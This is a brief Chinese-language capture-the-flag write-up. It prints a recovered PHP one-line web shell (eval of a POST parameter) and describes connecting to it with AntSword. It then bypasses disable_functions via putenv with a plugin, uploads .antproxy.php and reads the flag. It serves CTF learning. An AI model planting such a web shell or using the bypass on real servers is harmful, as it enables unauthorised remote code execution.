打开网址,发现被混淆了
这,百度了很久,终于找到一篇关于解码混淆的文章
https://www.52pojie.cn/thread-1074918-1-1.html
搞了很久解出来得到
<?php
highlight_file(__FILE__);
@eval($_POST[ymlisisisiook]);
?>
用蚁剑链接
发现只能再html目录下晃悠,写个phpinfo查看一下环境信息
发现很多函数被禁用了,不过没有禁putenv,参考蚁剑插件之绕disable_functions
下载好插件,运行插件,选择第一个模式,点击开始
上传成功,链接.antproxy.php
根目录得到flag